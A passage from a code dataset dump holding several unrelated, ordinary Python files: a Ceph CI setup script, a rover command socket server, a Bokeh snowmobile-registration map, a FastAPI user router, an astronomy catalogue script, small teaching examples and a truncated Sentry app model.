(len(content) > 0):\n\t\tpinStart = content.find(\"://\")\n\t\tif (pinStart == -1):\n\t\t\tcontent = \"\"\n\t\telse:\n\t\t\tpinEnd = content.find(\".\")\n\t\t\tpinCity = content[pinStart + 3:pinEnd]\n\n\t\t\tcharStart = pinEnd + 15\n\t\t\tcharEnd = content.find(\"</a>\")\n\t\t\tcharCity = 
unicode(content[charStart:charEnd], \"utf-8\")\n\n\t\t\tcitiesDict[pinCity] = charCity\n\t\t\tparsedCitiesFile.write(pinCity + \":\" + charCity.encode(\"utf-8\") + \"\\n\")\n\t\t\tcontent = content[charEnd + 4:]\n\n\tparsedCitiesFile.close()\n","sub_path":"KNserver/jiebaWeb/updatedCities.py","file_name":"updatedCities.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"225146204","text":"import pickle\nimport re\n\nfrom docopt import docopt\nfrom utils.configs import (\n get_configs,\n get_packages,\n get_registry_credentials,\n get_repos,\n get_subscription_credentials,\n)\nfrom utils.configure import setup_ssh_keys\n\nfrom cli.exceptions import NodeConfigError\nfrom cli.utilities.containers import Registry\nfrom cli.utilities.packages import Package\nfrom cli.utilities.packages import SubscriptionManager as sm\nfrom cli.utilities.packages import SubscriptionManagerError\nfrom cli.utilities.utils import os_major_version\nfrom cli.utilities.waiter import WaitUntil\nfrom utility.log import Log\n\nlog = Log(__name__)\n\ndoc = \"\"\"\nUtility to configure prerequisites for deployed cluster\n Usage:\n cephci/prereq.py --cluster <FILE>\n (--build <BUILD>)\n (--subscription <SUBSCRIPTION>)\n (--registry <REGISTRY>)\n [--setup-ssh-keys <BOOL>]\n [--config <FILE>]\n [--log-level <LOG>]\n\n cephci/prereq.py --help\n\n Options:\n -h --help Help\n -c --cluster <FILE> Cluster config file\n -b --build <BUILD> Build type [rh|ibm]\n -s --subscription <CRED> Subscription manager server\n -r --registry <STR> Container registry server\n -k --setup-ssh-keys <BOOL> Setup SSH keys on cluster\n -f --config <FILE> CephCI configuration file\n -l --log-level <LOG> Log level for log utility\n\"\"\"\n\n\ndef _set_log(level):\n log.logger.setLevel(level.upper())\n\n\ndef _load_cluster_config(config):\n cluster_conf = None\n with open(config, \"rb\") as f:\n cluster_conf = pickle.load(f)\n\n for _, cluster in cluster_conf.items():\n [node.reconnect() for node in cluster]\n\n return cluster_conf\n\n\ndef setup_subscription_manager(node, server):\n # Get configuration details from cephci configs\n configs = get_subscription_credentials(server)\n configs[\"force\"] = True\n\n # Get timeout and interval\n timeout = configs.get(\"timeout\")\n retry = configs.get(\"retry\")\n interval = int(timeout / retry)\n\n # Remove timeout and try configs\n configs.pop(\"timeout\")\n configs.pop(\"retry\")\n\n # Subscribe to server\n for w in WaitUntil(timeout=timeout, interval=interval):\n try:\n sm(node).register(**configs)\n log.info(f\"Subscribed to '{server}' server successfully\")\n return True\n except SubscriptionManagerError:\n log.error(f\"Failed to subscribe to '{server}' server. 
Retrying\")\n\n # Check if node subscribe to subscription manager\n if w.expired:\n log.error(f\"Failed to subscribe to '{server}' server.\")\n\n log.info(f\"Logined to subscription manager '{server}' successfully\")\n return False\n\n\ndef subscription_manager_status(node):\n # Get subscription manager status\n status = sm(node).status()\n\n # Check for overall status\n expr = \".*Overall Status:(.*).*\"\n match = re.search(expr, status)\n if not match:\n msg = \"Unexpected subscription manager status\"\n log.error(msg)\n raise SubscriptionManagerError(msg)\n\n return match.group(0)\n\n\ndef setup_local_repos(node, distro):\n # Get repos from cephci config\n repos = get_repos(\"local\", distro)\n\n # Add local repositories\n for repo in repos:\n Package(node).add_repo(repo=repo)\n\n log.info(\"Added local RHEL repos successfully\")\n return True\n\n\ndef registry_login(node, server, build):\n # Get registry config from cephci config\n config = get_registry_credentials(server, build)\n\n # Login to container registry\n Registry(node).login(**config)\n\n log.info(f\"Logined to container registry '{server}' successfully\")\n return True\n\n\ndef enable_rhel_repos(node, server, distro):\n # Get RHEL repos from cephci config\n repos = get_repos(server, distro)\n\n # Enable RHEL repos\n sm(node).repos.enable(repos)\n\n log.info(f\"Enabled repos '{server}' for '{distro}'\")\n return True\n\n\ndef prereq(cluster, build, subscription, registry, ssh=False):\n nodes = cluster.get_nodes()\n packages = \" \".join(get_packages())\n for node in nodes:\n distro = f\"rhel-{os_major_version(node)}\"\n if subscription == \"skip\":\n enable_rhel_repos(node, \"local\", distro)\n\n elif subscription in [\"cdn\", \"stage\"]:\n setup_subscription_manager(node, subscription)\n\n status = subscription_manager_status(node)\n if status == \"Unknown\":\n msg = f\"Subscription manager is in '{status}' status\"\n log.error(msg)\n raise NodeConfigError(msg)\n\n enable_rhel_repos(node, subscription, distro)\n\n Package(node).install(packages)\n\n if registry != \"skip\":\n registry_login(node, registry, build)\n\n if ssh:\n installer = cluster.get_ceph_object(\"installer\")\n setup_ssh_keys(installer, nodes)\n\n\nif __name__ == \"__main__\":\n args = docopt(doc)\n\n cluster = args.get(\"--cluster\")\n build = args.get(\"--build\")\n subscription = args.get(\"--subscription\")\n registry = args.get(\"--registry\")\n setup_ssh = args.get(\"--setup-ssh-keys\")\n config = args.get(\"--config\")\n log_level = args.get(\"--log-level\")\n\n _set_log(log_level)\n get_configs(config)\n\n cluster_dict = _load_cluster_config(cluster)\n for cluster_name in cluster_dict:\n prereq(cluster_dict.get(cluster_name), build, subscription, registry, setup_ssh)\n","sub_path":"cephci/prereq.py","file_name":"prereq.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"101600571","text":"import socket\n\ndef strToInt(string):\n if(len(string) == 0):\n# print('string length 0')\n return 0;\n x=0\n flag = 0\n if(string[0]=='-'):\n flag=1\n \n for i in range (0,len(string)):\n if string[i].isdigit():\n x+=int(string[i])*10**int(len(string)-i-1)\n# print('In strToInt',i,x)\n if (flag ==1):\n return (-1)*x\n else:\n return x\n\ndef create_socket():\n try:\n # Creating following 3 global variables\n global host\n global port\n global s # This is socket variable which is named s\n\n # Assigning values to these 3 global variables\n host = \"\"\n port = 9999\n 
s = socket.socket() # Creating a socket and assigning it to s\n\n    except socket.error as msg:\n        print(\"Socket creation error: \" + str(msg))\n\n\ndef bind_socket():\n    try:\n        # Declaring them again so that we can use the above global variable\n        global host\n        global port\n        global s\n        print(\"Binding the Port: \" + str(port))\n\n        s.bind((host, port))\n        s.listen(5)\n\n    except socket.error as msg:\n        print(\"Socket Binding error\" + str(msg) + \"\\n\" + \"Retrying...\")\n        bind_socket()\n\ndef read_commands(conn):\n    global mode,motorspeed1, motorspeed2, forward_left_motor, forward_right_motor, backward_left_motor, backward_right_motor;\n    \n    #IPCheckRoutine()\n    while True:\n        dataFromBase = str(conn.recv(1024))\n        print(\"\\n Received Data = \"+dataFromBase)\n        # print('lengthOfData', len(dataFromBase))\n        if(len(dataFromBase) > 3):\n            send_command(conn,'YES')\n            index1 = dataFromBase.index(',')\n            modeStr = dataFromBase[0:index1]\n            \n            mode = strToInt(modeStr)\n            \n            if(mode == 0):\n                propulsion(dataFromBase,index1);\n            elif(mode == 1):\n                science(dataFromBase,index1);\n            \n        else:\n            print(\"Not sending\",dataFromBase)\n            send_command(conn,'NO')\n\ndef socket_accept():\n    #s.accept returns : conn: object of a conversation and address is a list of IP address and a port\n    conn, address = s.accept()\n    print(\"Connection has been established! |\" + \" IP \" + address[0] + \" | Port\" + str(address[1]))\n    read_commands(conn) #A function defined above to read commands from the client\n    conn.close() #whenever the connection has been established, at the end we want to close the connection\n\ndef propulsion(data1,data2):\n    print(\"Propulsion\", data1,data2)\n\ndef science(dataFromBase,index1):\n    global m1, m2, m3, m4, m5, m6, m7, m8;\n    \n    index2 = dataFromBase.index(',',index1+1)\n    StrbaseMotorSpeed = dataFromBase[index1+1:index2]\n    m1 = strToInt(StrbaseMotorSpeed);\n    print(\"m1:\",m1)\n\n    index3 = dataFromBase.index(',',index2+1)\n    StrbaseMotorSpeed = dataFromBase[index2+1:index3]\n    m2 = strToInt(StrbaseMotorSpeed);\n    print(\"m2:\",m2)\n\n    index4 = dataFromBase.index(',',index3+1)\n    StrbaseMotorSpeed = dataFromBase[index3+1:index4]\n    m3 = strToInt(StrbaseMotorSpeed);\n    print(\"m3:\",m3)\n\n    index5 = dataFromBase.index(',',index4+1)\n    StrbaseMotorSpeed = dataFromBase[index4+1:index5]\n    m4 = strToInt(StrbaseMotorSpeed);\n    print(\"m4:\",m4)\n\n    index6 = dataFromBase.index(',',index5+1)\n    StrbaseMotorSpeed = dataFromBase[index5+1:index6]\n    m5 = strToInt(StrbaseMotorSpeed);\n    print(\"m5:\",m5)\n\n    index7 = dataFromBase.index(',',index6+1)\n    StrbaseMotorSpeed = dataFromBase[index6+1:index7]\n    m6 = strToInt(StrbaseMotorSpeed);\n    print(\"m6:\",m6)\n\n    index8 = dataFromBase.index(',',index7+1)\n    StrbaseMotorSpeed = dataFromBase[index7+1:index8]\n    m7 = strToInt(StrbaseMotorSpeed);\n    print(\"m7:\",m7)\n    \n    print(index8)\n    #index9 = dataFromBase.index(',',index8+1)\n    StrbaseMotorSpeed = dataFromBase[index8+1:]\n    m8 = strToInt(StrbaseMotorSpeed);\n    print(\"m8:\",m8)\n    \n\ndef send_command(conn1,data1):\n    conn1.send(str.encode(data1))\n\n\n\n\ncreate_socket()\nbind_socket()\nsocket_accept()\n","sub_path":"Python_Codes/kyd_code/testing/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127808208","text":"\n\n# Dataviz project for plotting snowmobile registrations by county in Illinois using Bokeh\n# Zack Larsen 10/27/2018\n\n# Snowmobile data downloaded 
from:\n#https://data.illinois.gov/dataset/1fab1c10-5230-4e75-8c4c-96ae08a1bd56/resource/6c7c1f88-4748-4691-9df8-04a3067c5eab/download/hodnrtempboatssnowmastercurrentexcelfiles20181001snowactiveregistrations.xlsx\n\nimport pandas as pd\npd.set_option(\"display.max_rows\",100)\npd.set_option(\"display.max_columns\",20)\nimport os\n\nfrom bokeh.io import show\nfrom bokeh.models import LogColorMapper\nfrom bokeh.palettes import Viridis6 as palette\nfrom bokeh.plotting import figure\nfrom bokeh.sampledata.us_counties import data as counties\nfrom bokeh.plotting import figure, output_file, save\n\npalette.reverse()\n\n\n\nos.getcwd()\nos.chdir('/Users/zacklarsen/Desktop/Projects/Dataviz/Python')\nos.listdir()\n\nsnowmobiles = pd.read_excel('hodnrtempboatssnowmastercurrentexcelfiles20181001snowactiveregistrations.xlsx')\nsnowmobiles.head()\n\n# Get the snowmobile counts by counties in a dictionary:\ndf = snowmobiles.groupby('COUNTY').Registration_Number.nunique().reset_index(name='counts')\ncounty_snowmobiles = pd.Series(df['counts'].values,index=df['COUNTY']).to_dict()\n# county_snowmobiles\n# len(county_snowmobiles) # 91\n\n\n# Save shape longitude and latitude values for all Illinois counties:\ncounties = {\n code: county for code, county in counties.items() if county[\"state\"] == \"il\"\n}\n\n# counties\n\ncounty_names = [county['name'].upper() for county in counties.values()]\n# len(county_names) # 102\n# county_names\ncounty_xs = [county[\"lons\"] for county in counties.values()]\n# len(county_xs) # 102\n# county_xs\ncounty_ys = [county[\"lats\"] for county in counties.values()]\n# len(county_ys) # 102\n# county_ys\n\n\n\n# Get the counties that appear in the Bokeh county data for Illinois but not the\n# snowmobile spreadsheet from Illinois.gov:\n# for key in county_names:\n# if key not in county_snowmobiles.keys():\n# print(key)\n\n# Get the counties from the snowmobile spreadsheet that do not appear in the Bokeh\n# county data:\n# for key in county_snowmobiles.keys():\n# if key not in county_names:\n# print(key)\n\n# We need to rename the counties from the snowmobile spreadsheet that were\n# misspelled:\ncounty_snowmobiles['DE WITT'] = county_snowmobiles.pop('DEWITT')\ncounty_snowmobiles['GREENE'] = county_snowmobiles.pop('GREEENE')\ncounty_snowmobiles['JO DAVIESS'] = county_snowmobiles.pop('JODAVIS')\ncounty_snowmobiles['ROCK ISLAND'] = county_snowmobiles.pop('ROCKISLAND')\ncounty_snowmobiles['ST. CLAIR'] = county_snowmobiles.pop('STCLAIR')\n\n# Look at this again to see which counties are still missing from county_snowmobiles:\n# for key in county_names:\n# if key not in county_snowmobiles.keys():\n# print(key)\n\n# We need to fill in values of zero for any\n# counties in Illinois that don't have a snowmobile registered:\nfor key in county_names:\n if key not in county_snowmobiles.keys():\n county_snowmobiles[key] = 0\n\n# len(county_snowmobiles) # 108; there should be 102, so these 6 need to be removed:\nextras = []\nfor key in county_snowmobiles.keys():\n if key not in county_names:\n extras.append(key)\n# extras\n\nfor state in extras:\n del county_snowmobiles[state]\n\n# len(county_snowmobiles) # 102. 
Success!\n\n\n\n\n\n\n\n\n\n\n# county_snowmobiles\n# counties\n# counties.values()\n\n# Get the county name from counties\n# for county_id in counties.values():\n#     print(county_id['name'])\n\n# [county_snowmobiles[county['name'].upper()] for county in counties.values()]\n\n# We need to have a county_id and corresponding rate so that we can have the\n# number of vehicles for each county (county_vehicles) in the same order as the\n# counties themselves (from Bokeh data):\n\ncounty_vehicles = [county_snowmobiles[county['name'].upper()] for county in counties.values()]\n# county_vehicles # List of values\n\n# len(county_vehicles) # 102. Booyah!!\n\n\n\n\n\n\n\n\n\n\n# Constructing the plot:\n\ncolor_mapper = LogColorMapper(palette=palette)\n\ndata=dict(\n    x=county_xs,\n    y=county_ys,\n    name=county_names,\n    count=county_vehicles\n)\n\nTOOLS = \"pan,wheel_zoom,reset,hover,save\"\n\np = figure(\n    title=\"Illinois snowmobile registrations\", tools=TOOLS,\n    x_axis_location=None, y_axis_location=None,\n    tooltips=[\n        (\"Name\", \"@name\"), (\"Snowmobile count\", \"@count\"), (\"(Long, Lat)\", \"($x, $y)\")\n    ])\n\np.grid.grid_line_color = None\n\np.hover.point_policy = \"follow_mouse\"\n\np.patches('x', 'y', source=data,\n          fill_color={'field': 'count', 'transform': color_mapper},\n          fill_alpha=0.7, line_color=\"white\", line_width=0.5)\n\n\nshow(p)\n\n\n\n\n# Save plot as HTML file:\nfrom bokeh.plotting import figure, output_file, save\noutput_file(\"Illinois snowmobiles.html\")\nsave(p)\n\n\n# Delete the plot when finished or rendering a second time:\ndel p\n\n\n\n\n\n\n\ndir()\nglobals()\nlocals()\n","sub_path":"src/Choropleth.py","file_name":"Choropleth.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"316592748","text":"from fastapi import APIRouter, Depends, status, HTTPException\nfrom .. 
import schemas, models\nfrom ..hashing import Hash\nfrom ..database import get_db\nfrom sqlalchemy.orm import Session\n\n\nrouter = APIRouter(\n prefix='/users',\n tags=['Users'])\n\n\n@router.post('/', status_code=status.HTTP_201_CREATED, response_model=schemas.ShowUser, tags=['Users'])\ndef createUser(request: schemas.User, db: Session = Depends(get_db)):\n new_user = models.User(\n firstName=request.firstName,\n lastName=request.lastName,\n email=request.email,\n password=Hash.bcrypt(request.password)\n )\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n return new_user\n\n\n@router.get('/{id}', status_code=status.HTTP_200_OK, response_model=schemas.ShowUser, tags=['Users'])\ndef showUser(id: int, db: Session = Depends(get_db)):\n user = db.query(models.User).filter(models.User.id == id).first()\n if not user:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Could not find user with ID {id}')\n return user\n","sub_path":"challenge/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357335222","text":"#!/usr/bin/python\n\n#Author: Duncan Campbell\n#Written: July 9, 2013\n#Yale University\n#Description: Read in group finder mock runs and add information from the mock\n#group finder input must contain group ID and galaxy ID.\n\n###packages###\nfrom __future__ import print_function, division\nimport numpy as np\nimport h5py\nimport sys\nimport math\nfrom astropy.io import ascii\nfrom astropy import table\nfrom astropy import cosmology\nfrom scipy import interpolate\nimport custom_utilities as cu\n\ndef main():\n \n if len(sys.argv)<2: group_finder = 'yang' #berlind, tinker\n else: group_finder = sys.argv[1]\n if len(sys.argv)<3: catalogue = 'Mr19_age_distribution_matching_mock'\n else: catalogue = sys.argv[2]\n \n print('building a value added group catalogue for the {0} group finder and the {1}'.format(group_finder,catalogue))\n \n savepath = cu.get_output_path()+'processed_data/'+group_finder+'_groupcat/mock_runs/4th_run/custom_catalogues/'\n\n #############################################################################################\n savepath = cu.get_output_path()+'processed_data/'+group_finder+'_groupcat/mock_runs/4th_run/custom_catalogues/'\n #open mock group catalogue\n filepath = cu.get_output_path()+'processed_data/'+group_finder+'_groupcat/mock_runs/4th_run/'\n catalogue_name = catalogue+'_radec_mock'\n f = h5py.File(filepath+catalogue_name+'.hdf5', 'r')\n GC = f.get(catalogue_name)\n GC = np.array(GC)\n\n #open x,y,z mock\n filepath = cu.get_output_path()+'processed_data/hearin_mocks/custom_catalogues/'\n catalogue_name = catalogue\n f = h5py.File(filepath+catalogue_name+'.hdf5', 'r')\n mock = f.get(catalogue_name)\n mock = np.array(mock)\n\n #open the ra,dec mock\n filepath = cu.get_output_path()+'processed_data/hearin_mocks/custom_catalogues/'\n filename = catalogue+'_radec_mock.dat'\n mock_radec = ascii.read(filepath+filename, delimiter='\\s', Reader=ascii.Basic, data_start=1)\n mock_radec = np.array(mock_radec)\n #############################################################################################\n\n #define some constants\n c = 299792.458 #km/s\n cosmo = cosmology.FlatLambdaCDM(H0=100, Om0=0.27) #h=1\n Omega_m = cosmo.Om0\n print('using cosmology: ', cosmo)\n z_upper_lim = 0.068\n z_lower_lim = 0.020\n print('lower redshift: {0} upper redshift: {1}'.format(z_lower_lim,z_upper_lim))\n\n #create a new 
catalogue to store results\n dtype=[('ID','>i8'),('k_1','>i8'),('k_2','>i8'),('RA','>f8'),('DEC','>f8'),('Z','>f8'),('red','>i8'),\\\n ('M_u,0.1','>f8'),('M_g,0.1','>f8'),('M_r,0.1','>f8'),('M_i,0.1','>f8'),('M_z,0.1','>f8'),('MSTAR','>f8'),\\\n ('GROUP_ID','>i8'),('MGROUP','>f8'),('ZGROUP','>f8'),('R200','>f8'),\\\n ('CEN_IND','>i8'),('RANK','>i8'),('RPROJ','>f8'),('N_sat','>i8'),('N_sat_red','>i8'),('N_sat_blue','>i8'),\\\n ('HALO_M','>f8'),('HALO_RANK','>i8')]\n dtype = np.dtype(dtype)\n data = np.recarray((len(GC),), dtype=dtype)\n data.fill(-99.9) #empty value indicator\n\n data['GROUP_ID'] = GC['group_ID']\n\n #caclulate index into ra-dec mock file\n index = np.argsort(mock_radec['ID'])\n sorted_IDs = mock_radec['ID'][index]\n ind = np.searchsorted(sorted_IDs,GC['gal_ID'])\n ind = index[ind]\n \n #grab values from ra-dec mock\n data['k_1'] = ind\n data['ID'] = mock_radec['ID'][ind]\n data['RA'] = mock_radec['ra'][ind]\n data['DEC'] = mock_radec['dec'][ind]\n data['Z'] = mock_radec['z'][ind]\n \n #calculate index into xyz mock\n ind = mock_radec['k'][ind]\n #grab values from xyz mock\n data['k_2'] = ind\n data['M_g,0.1'] = mock['M_r,0.1'][ind]+mock['g-r'][ind]\n data['M_r,0.1'] = mock['M_r,0.1'][ind]\n #data['HALO_M'] = mock['M200b_host'][ind]\n data['HALO_M'] = mock['M_host'][ind]\n\n #determine cen/sat designation in xyz mock\n result = np.where(mock['ID_host'][ind]==-1)[0]\n data['HALO_RANK'][result] = 1 #central\n result = np.where(mock['ID_host'][ind]!=-1)[0]\n data['HALO_RANK'][result] = 0 #satellite\n\n #calculate galaxy colors\n color = data['M_g,0.1']-data['M_r,0.1']\n LHS = 0.7 - 0.032*(data['M_r,0.1']+16.5) #Weinmann 2006\n blue = np.where(color<LHS)[0] #indices of blue galaxies\n red = np.where(color>LHS)[0] #indicies of red galaxies\n \n #record color designation\n data['red'][red] = 1\n data['red'][blue] = 0\n\n for i in range(0,len(data)):\n group_id = data['GROUP_ID'][i]\n members = np.where(data['GROUP_ID']==group_id)[0]\n central = np.where(data['M_r,0.1'][members]==min(data['M_r,0.1'][members]))[0][0]\n central = members[central]\n satellites = np.where(members!=central)[0]\n satellites = members[satellites]\n #record rank\n data['RANK'][central] = 1\n data['RANK'][satellites] = 0\n #record number of satellites in the group\n data['N_sat'][members] = len(satellites)\n sat_red = np.where(np.in1d(satellites,red)==True)[0]\n data['N_sat_red'][members] = len(sat_red)\n sat_blue = np.where(np.in1d(satellites,blue)==True)[0]\n data['N_sat_blue'][members] = len(sat_blue)\n #record other group information\n data['CEN_IND'][members] = central\n data['ZGROUP'][members] = data['Z'][central]\n #calculate projected distance from central\n da = cu.spheredist(data['RA'][central],data['DEC'][central],data['RA'][members],data['DEC'][members])\n da = np.radians(da) #convert to radians\n chi = cosmo.comoving_distance(data['ZGROUP'][central]).value*1000.0 #in kpc\n data['RPROJ'][members]=chi/(1.0+data['ZGROUP'][members])*da #caclulate physical seperation\n data['RPROJ'][central]=0.0 #==0 if it is the central\n \n #remove galaxies from the sample which fall outside the volume\n keep = np.where((data['ZGROUP']<z_upper_lim) & (data['ZGROUP']>z_lower_lim))[0]\n data = data[keep]\n\n #run through the data again and fix indices after we removed some galaxies\n for i in range(0,len(data)):\n group_id = data['GROUP_ID'][i]\n members = np.where(data['GROUP_ID']==group_id)[0]\n central = np.where(data['M_r,0.1'][members]==min(data['M_r,0.1'][members]))[0][0]\n central = members[central]\n 
data['CEN_IND'][members] = central\n\n    #read in mass halo function\n    filepath = cu.get_base_path()+'fortran_code/mass_functions/'\n    filename = 'Bolshoi_Massfunc.dat'\n    names = ['dM','dn','nsum']\n    dndM = ascii.read(filepath+filename, delimiter='\\s', names=names, data_start=0)\n    dndM = np.array(dndM)\n\n    #identify centrals and satellites\n    centrals = np.where(data['RPROJ']==0)[0]\n    satellites = np.where(data['RPROJ']>0)[0]\n\n    #calculate group total r-band luminosities\n    S_r = 4.64\n    group_L = np.zeros((len(data),),dtype=np.float)\n\n    for i in range(0,len(centrals)):\n        gal = np.where(data['GROUP_ID']==data['GROUP_ID'][centrals[i]])[0]\n        group_L[gal] = np.log10(np.sum(10.0**(solar_lum(data['M_r,0.1'][gal], S_r))))\n    tot_lum = group_L[centrals]\n\n    #calculate abundance matched masses for groups\n    geo_f = 1.0/8.0 #geometric factor: spherical octant\n    r_max = cosmo.comoving_distance(z_upper_lim).value #in Mpc\n    r_min = cosmo.comoving_distance(z_lower_lim).value #in Mpc\n    mock_volume = (4.0/3.0)*math.pi*(r_max**3.0-r_min**3.0)*geo_f\n\n    #calculate the group luminosity function\n    N_gal = np.cumsum(np.zeros(len(centrals))+1) #cumulative number of groups\n    n_gal = N_gal/mock_volume #number density\n    L_gal = np.sort(tot_lum)[::-1] #group luminosity\n    ind = np.argsort(tot_lum)[::-1]\n\n    #integrate halo mass function\n    n_halo = dndM['nsum'][::-1] #cumulative number density\n    M_halo = dndM['dM'][::-1] #halo mass\n\n    #interpolate the halo mass function\n    x = np.log10(n_halo)\n    y = M_halo\n    f = interpolate.interp1d(x, y, kind='linear', bounds_error=False, fill_value=0.0)\n\n    data['MGROUP'][centrals[ind]] = f(np.log10(n_gal))\n\n    for i in range(0,len(centrals)):\n        gal = np.where(data['GROUP_ID']==data['GROUP_ID'][centrals[i]])[0]\n        data['MGROUP'][gal] = data['MGROUP'][centrals[i]]\n\n    R_200 = 258.1 * (10.0**data['MGROUP']/(10.0**12.0))**(1.0/3.0)*(Omega_m/0.25)**(1.0/3.0)*(1.0+data['ZGROUP'])**(-1.0) \n    data['R200'] = R_200\n    \n    print('saving hdf5 version of the catalogue...')\n    filename = catalogue+'_groups'\n    print(savepath+filename+'.dat')\n    f = h5py.File(savepath+filename+'.hdf5', 'w')\n    dset = f.create_dataset(filename, data=data)\n    f.close()\n\n    print('saving ascii version of the catalogue...')\n    print(savepath+filename+'.dat')\n    data_table = table.table.Table(data=data)\n    ascii.write(data_table, savepath+filename+'.dat')\n\ndef solar_lum(M,Msol):\n    L = ((Msol-M)/2.5)\n    return L \n\nif __name__ == '__main__':\n    main()\n","sub_path":"mock_groups/process_mockruns.py","file_name":"process_mockruns.py","file_ext":"py","file_size_in_byte":8868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"16030928","text":"\n\ndef another_example():\n    try:\n        x=int(input(\"Enter a number and I will return double that value... 
\"))\n print(x*2)\n except ValueError:\n print(\"Value entered has to be an integer\" )\n\ndef main():\n try:\n ReadFile=open(\"sample.txt\", \"r\")\n for line in ReadFile:\n print(line)\n ReadFile.close()\n except IOError:\n print(\"File not found\")\n\n\nif __name__ == \"__main__\":\n main()\n another_example()\n print(\"App is done\")\n ","sub_path":"udemy_python_course/section8/try_catch.py","file_name":"try_catch.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"450079147","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\ndef time_measurement(func):\r\n\r\n def wrapper(*args, **kwargs):\r\n import time\r\n start = time.time()\r\n result = func(*args, **kwargs)\r\n end = time.time()\r\n print('{}: {:.0f}ms'.format(func.__name__, (end - start) * 1000))\r\n return result\r\n\r\n return wrapper\r\n\r\n\r\nclass LSystem(object):\r\n\r\n def __init__(self, axiom=None, rules=None):\r\n self.set_axiom(axiom)\r\n self.set_rules(rules)\r\n\r\n def set_axiom(self, axiom):\r\n self.cache = {}\r\n self.axiom = axiom\r\n\r\n def set_rules(self, rules):\r\n self.cache = {}\r\n try:\r\n import re\r\n self.rules = dict([r.split('=') for r in rules])\r\n self.rx = re.compile('|'.join(map(re.escape, self.rules)))\r\n except ValueError:\r\n self.rules = None\r\n\r\n def _replace(self, text):\r\n return self.rx.sub(lambda m: self.rules[m.group()], text)\r\n\r\n @time_measurement\r\n def generate(self, n=1):\r\n if n in self.cache:\r\n return self.cache[n]\r\n text = self.axiom\r\n for i in range(n):\r\n text = self._replace(text)\r\n self.cache[n] = text\r\n return text\r\n\r\n\r\nif __name__ == '__main__':\r\n import turtle\r\n\r\n lsystem = LSystem(axiom='F++F++F', rules=['F=F-F++F-F'])\r\n\r\n turtle.speed(0)\r\n output = lsystem.generate(10)\r\n output = lsystem.generate(10)\r\n output = lsystem.generate(10)\r\n for s in output:\r\n if s == 'F':\r\n turtle.fd(1)\r\n elif s == '+':\r\n turtle.rt(60)\r\n elif s == '-':\r\n turtle.lt(60)\r\n","sub_path":"python/lsystem/lsystem.py","file_name":"lsystem.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"488224034","text":"from __future__ import absolute_import\n\nimport six\nimport uuid\nimport hmac\nimport itertools\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.template.defaultfilters import slugify\nfrom hashlib import sha256\n\nfrom sentry.constants import SentryAppStatus, SENTRY_APP_SLUG_MAX_LENGTH\nfrom sentry.models import Organization\nfrom sentry.models.apiscopes import HasApiScopes\nfrom sentry.db.models import (\n ArrayField,\n BoundedPositiveIntegerField,\n FlexibleForeignKey,\n ParanoidModel,\n)\n\n# When a developer selects to receive \"<Resource> Webhooks\" it really means\n# listening to a list of specific events. This is a mapping of what those\n# specific events are for each resource.\nEVENT_EXPANSION = {\n 'issue': ['issue.created', 'issue.resolved'],\n}\n\n# We present Webhook Subscriptions per-resource (Issue, Project, etc.), not\n# per-event-type (issue.created, project.deleted, etc.). 
These are valid\n# resources a Sentry App may subscribe to.\nVALID_EVENT_RESOURCES = (\n 'issue',\n)\n\nREQUIRED_EVENT_PERMISSIONS = {\n 'issue': 'event:read',\n 'project': 'project:read',\n 'member': 'member:read',\n 'organization': 'org:read',\n 'team': 'team:read',\n}\n\n# The only events valid for Sentry Apps are the ones listed in the values of\n# EVENT_EXPANSION above. This list is likely a subset of all valid ServiceHook\n# events.\nVALID_EVENTS = tuple(itertools.chain(\n *EVENT_EXPANSION.values()\n))\n\n\ndef default_uuid():\n return six.binary_type(uuid.uuid4())\n\n\nclass SentryApp(ParanoidModel, HasApiScopes):\n __core__ = True\n\n application = models.OneToOneField(\n 'sentry.ApiApplication',\n null=True,\n on_delete=models.SET_NULL,\n related_name='sentry_app',\n )\n\n # Much of the OAuth system in place currently depends on a User existing.\n # This \"proxy user\" represents the SentryApp in those cases.\n proxy_user = models.OneToOneField(\n 'sentry.User',\n null=True,\n on_delete=models.SET_NULL,\n related_name='sentry_app'\n )\n\n # The Organization the Sentry App was created in \"owns\" it. Members of that\n # Org have differing access, dependent on their role within the Org.\n owner = FlexibleForeignKey('sentry.Organization',\n related_name='owned_sentry_apps')\n\n name = models.TextField()\n slug = models.CharField(max_length=SENTRY_APP_SLUG_MAX_LENGTH, unique=True)\n status = BoundedPositiveIntegerField(\n default=SentryAppStatus.UNPUBLISHED,\n choices=SentryAppStatus.as_choices(),\n db_index=True,\n )\n uuid = models.CharField(max_length=64,\n default=default_uuid)\n\n redirect_url = models.URLField(null=True)\n webhook_url = models.URLField()\n # does the application subscribe to `event.alert`,\n # meaning can it be used in alert rules as a {service} ?\n is_alertable = models.BooleanField(default=False)\n\n events = ArrayField(null=True)\n\n overview = models.TextField(null=True)\n\n date_added = models.DateTimeField(default=timezone.now)\n date_updated = models.DateTimeField(default=timezone.now)\n\n class Meta:\n app_label = 'sentry'\n db_table = 'sentry_sentryapp'\n\n @classmethod\n def visible_for_user(cls, user):\n if user.is_superuser:\n return cls.objects.all()\n\n return cls.objects.filter(\n Q(status=SentryAppStatus.PUBLISHED) | 